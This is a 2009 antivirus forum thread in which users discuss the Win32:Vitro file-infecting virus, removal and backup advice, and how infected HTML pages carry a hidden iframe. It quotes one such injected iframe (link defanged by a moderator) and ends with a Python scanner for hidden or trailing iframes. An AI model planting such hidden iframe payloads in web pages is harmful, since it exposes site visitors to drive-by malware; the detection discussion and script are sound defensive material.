Author Topic: Malware name Win32:Vitro  (Read 341292 times)


Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Re: Malware name Win32:Vitro
« Reply #195 on: April 10, 2009, 01:52:58 AM »
This virus is horrible from what I understand and needs to get a REMOVAL TOOL so if it does try to infect a PC, the REMOVAL TOOL can stop it.
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline Confused Computer User

  • Avast Evangelist
  • Advanced Poster
  • ***
  • Posts: 700
  • The answer is 42
Re: Malware name Win32:Vitro
« Reply #196 on: April 10, 2009, 02:34:02 AM »
Not much sense in doing that. This thing (because it's so much more than a virus now) infects executable files.

A REMOVAL TOOL wouldn't stand a chance. At least I think so. The only options are prevention (first and foremost) and format.  :(
Computer Systems:

Intel Pentium 4 641 / 2GB RAM / Vista Home Basic SP2 / avast! 5.0 Home / SAS Free / MBAM Free / Windows Defender / Windows Firewall / Spyware Blaster/ Secunia PSI / Firefox 3.6 / Opera 10.5

Core2Duo T8300 / 4GB RAM / Vista Home Premium SP2 (32 bit version) / Same Software.

cballar2

  • Guest
Re: Malware name Win32:Vitro
« Reply #197 on: April 10, 2009, 02:45:45 AM »
Hey all-

I recently contracted this virus on my home desktop computer, and was wondering if other hardware such as iPods that are connected to the computer by USB are able to contract and share the virus to other computers.  Just a precaution before I try to plug my iPod back into my laptop.  Thanks.

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Re: Malware name Win32:Vitro
« Reply #198 on: April 10, 2009, 03:14:56 AM »
Not much sense in doing that. This thing (because it's so much more than a virus now) infects executable files.

A REMOVAL TOOL wouldn't stand a chance. At least I think so. The only options are prevention (first and foremost) and format.  :(

Wouldn't it be possible if the REMOVAL TOOL added its own extension with a whole different coding like ".ffs" or ".wgr" so it wouldn't infect it?

Offline Confused Computer User

  • Avast Evangelist
  • Advanced Poster
  • ***
  • Posts: 700
  • The answer is 42
Re: Malware name Win32:Vitro
« Reply #199 on: April 10, 2009, 03:59:38 AM »
 ???

Wouldn't it be possible if the REMOVAL TOOL added its own extension with a whole different coding like ".ffs" or ".wgr" so it wouldn't infect it?

Up until now I've never seen those types of files. I looked for a description and only found one for ".ffs" at:

http://en.wikipedia.org/wiki/Unix_File_System

The thing is that we can't save these files in formats that Windows doesn't recognize and then try to execute them. It would be like trying to run a ".exe" file on Mac OS X. It won't happen unless you use special applications. (see link)
http://www.pcuser.com.au/pcuser/hs2.nsf/lookup+1/83ADDE11BB01E5A1CA256C48000F4708

So even if the file is a non executable it would have to be opened by one that is so still not much choice since that would probably be opened.

I could be wrong... I'm not sure if the ".wgr" type of files run on Windows.

optikal_illuzion

  • Guest
Re: Malware name Win32:Vitro
« Reply #200 on: April 10, 2009, 05:39:05 AM »
This Vitro virus makes me sooooooooooooooo glad I'm still running Windows ME on my computer.
My wife on the other hand..... Not so happy. Her system has been killed by this virus 5 times in the last week. And mine hasn't been affected or infected at all. She has Avast on her computer and the thing will detect the Win32 Vitro file on every system32 she has. Been through file recoveries, and formats and the pesky thing still comes back.

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Re: Malware name Win32:Vitro
« Reply #201 on: April 10, 2009, 06:20:08 AM »
???

Wouldn't it be possible if the REMOVAL TOOL added its own extension with a whole different coding like ".ffs" or ".wgr" so it wouldn't infect it?

Up until now I've never seen those types of files. I looked for a description and only found one for ".ffs" at:

http://en.wikipedia.org/wiki/Unix_File_System

The thing is that we can't save these files in formats that Windows doesn't recognize and then try to execute them. It would be like trying to run a ".exe" file on Mac OS X. It won't happen unless you use special applications. (see link)
http://www.pcuser.com.au/pcuser/hs2.nsf/lookup+1/83ADDE11BB01E5A1CA256C48000F4708

So even if the file is a non executable it would have to be opened by one that is so still not much choice since that would probably be opened.

I could be wrong... I'm not sure if the ".wgr" type of files run on Windows.

Maybe the program could add the extensions so it works like with Microsoft Small Business. O_o

shaybear

  • Guest
Re: Malware name Win32:Vitro
« Reply #202 on: April 10, 2009, 06:29:07 AM »
all of you are kidding right ?
fighting it ?
if you see vitro and you have external Hard Drive
Bash external Hard Drive with a hammer then burn it in microwave
insert your OS disk (make sure its read-only like CD-DVD)
format your hard drives
install OS
go buy a new external Hard Drive

LMFAO!!!!  OK, I had to quote this and thank you for posting it.  In a matter of 10 seconds I went from wanting to put my fist through my PC, to laughing and starting with a clear and focused mind... LOL Bash with a hammer then burn it in a microwave hahaha  ok, now back to going Xena on this damn virus's ass....

shaybear

  • Guest
Re: Malware name Win32:Vitro
« Reply #203 on: April 10, 2009, 06:55:00 AM »
ok in my system 32 folder ( I am running XP service pack 3 ) there is the winlogon.exe file, but also in my C:Windows/Temp folder there is an exe file named winlognn ( that's winlogNn - 2 "n" s) could that temp folder file be the issue??? it was created yesterday ( 4/9/2009) .   we reformatted this POS on 4/6/2009 and with it being in the TEMP folder, I'm thinking that's the virus....  ( sorry I am not a very computer-savvy girl lol )

Offline Confused Computer User

  • Avast Evangelist
  • Advanced Poster
  • ***
  • Posts: 700
  • The answer is 42
Re: Malware name Win32:Vitro
« Reply #204 on: April 10, 2009, 02:42:23 PM »

Maybe the program could add the extensions so it works like with Microsoft Small Business. O_o


I have no clue what that is. Sorry.

MAXIUM

  • Guest
Re: Malware name Win32:Vitro
« Reply #205 on: April 10, 2009, 09:42:49 PM »

ADAMSNAKE

  • Guest
Re: Malware name Win32:Vitro
« Reply #206 on: April 10, 2009, 10:48:08 PM »
Hi guys, I've been reading this topic over the past few days looking for ways to remove this virus without formatting but no luck. So instead I did format and I did get the virus again using old backups lmao.

I removed my old backups but did manage to keep some ISO files which are same (no virus alert from avast).

With my old backups I had txt documents that had the virus in. .exe had them in.

A JPEG picture did not have it in.

I am wondering about MP3, when my PC got infected I had another HDD 400gig full of music and films. I did turn off the PC and disconnect that drive when messing around. I managed to get rid of the virus I think. But I am unsure about my 400gig, I have run a few .avi and opened a few .txt files and no virus alert. Before I go to bed I will run a scan.

What file types are affected by this virus? And what are not.

I read that only XP is affected by this virus? Strange hey.

Last question, I have a friend that has important movies and stuff on his PC, he has been affected with this virus but he has no way of backing up his stuff. Is there any way on how to remove it without formatting and losing everything? If he does a virus scan and removes the virus it will eat away his system files so that's out of the question.

any help

Thank you so much.

Adam Evans.

BTW two virus programs that I know pick this up, AVG FREE and AVAST! HOME FREE.

cheers guys

boybawang

  • Guest
Re: Malware name Win32:Vitro
« Reply #207 on: April 11, 2009, 02:14:00 AM »
Last question, I have a friend that has important movies and stuff on his PC, he has been affected with this virus but he has no way of backing up his stuff. Is there any way on how to remove it without formatting and losing everything?
1. Make a thorough bootscan with AVAST first before doing a backup. And allow it to delete all infected files. Don't worry, your movies won't be deleted.

2. After it's done with the cleaning, your system will continue booting. DON'T ALLOW IT TO CONTINUE BOOTING!! Turn off your system immediately before it completes the boot-up process because Vitro still exists.

3. If you wanna backup in a clean environment without any worries about Vitro infecting in the background, download LINUX UBUNTU. Burn it, boot it, and do all the backup from there. It has a simple burning utility that should be enough for your purpose. But don't backup HTML/HTM files and EXE files, especially exe files below 100KB in size, because most Virus passes AVAST detection.  That's all.


Off topic: I just found the funniest Vitro removal guide in the following link!
skip immediately to the Vitro manual removal instruction part for the best humor ;D ;D ;D ;D
http://www.spywareremove.com/removeWin32Vitro.html

DonNils

  • Guest
Re: Malware name Win32:Vitro
« Reply #208 on: April 12, 2009, 06:12:23 AM »
Quote
How did you know that your HTML files are not infected? By scanning with AVAST?
You should know that so far AVAST can't detect an infected HTML file!  You better try to open the file with notepad and you will see the malicious link in iFrame attached at the bottom.
The same applies to EXE files. Not all infected EXE files can be detected by avast so the size is our only hint.

Yes lol I checked them all (and Notepad++ has a nice function to search in all files in a given directory for text... Ctrl+F)
Nothing like iframe was detected.. neither I opened it with a web browser; just viewed it!

boybawang

  • Guest
Re: Malware name Win32:Vitro
« Reply #209 on: April 12, 2009, 08:47:49 AM »
Hi DonNils,

It's something that looks like this at the bottom of HTM page:
<iframe src="hxxp://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>

Misak changed http -> hxxp (live malware link)
« Last Edit: April 12, 2009, 01:55:51 PM by misak »
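
The manual check discussed in the last few replies (open each HTM/HTML file and look for a hidden iframe attached at the bottom) can be automated. The following is an added example, not code from any poster or from avast; the function names, reason labels and the sample page with its placeholder URL are constructed for illustration.

```python
import html
import re
from pathlib import Path

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)
END_HTML_RE = re.compile(r"</html\s*>", re.IGNORECASE)


def suspicious_iframes(text):
    """Return (src, reasons) for each iframe that is hidden or trails </html>."""
    ends = [m.end() for m in END_HTML_RE.finditer(text)]
    findings = []
    for m in IFRAME_RE.finditer(text):
        tag = html.unescape(m.group(0))  # decode &#100;-style entities first
        reasons = []
        if HIDDEN_RE.search(tag):
            reasons.append("hidden-style")
        if ends and m.start() >= ends[-1]:
            reasons.append("after-</html>")
        if reasons:
            src = SRC_RE.search(tag)
            findings.append((src.group(1) if src else "", reasons))
    return findings


def scan_tree(root):
    """Scan every .htm/.html file under root; return {path: findings}."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in (".htm", ".html"):
            found = suspicious_iframes(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits


# Constructed sample: a normal embed, then a hidden iframe appended after </html>.
SAMPLE = (
    "<html><body><p>hello</p>"
    '<iframe src="https://video.example/embed" width="560" height="315"></iframe>'
    "</body></html>\n"
    '<iframe src="hxxp://placeholder.invalid/rc/" style="&#100;isplay:none"></iframe>'
)

if __name__ == "__main__":
    for src, reasons in suspicious_iframes(SAMPLE):
        print(src, reasons)
```

Decoding entities before matching matters because a plain text search for "display:none" misses a tag written with character references, as in the snippet quoted above. Run `scan_tree` against a backup from a clean boot environment so nothing on the infected system is executed.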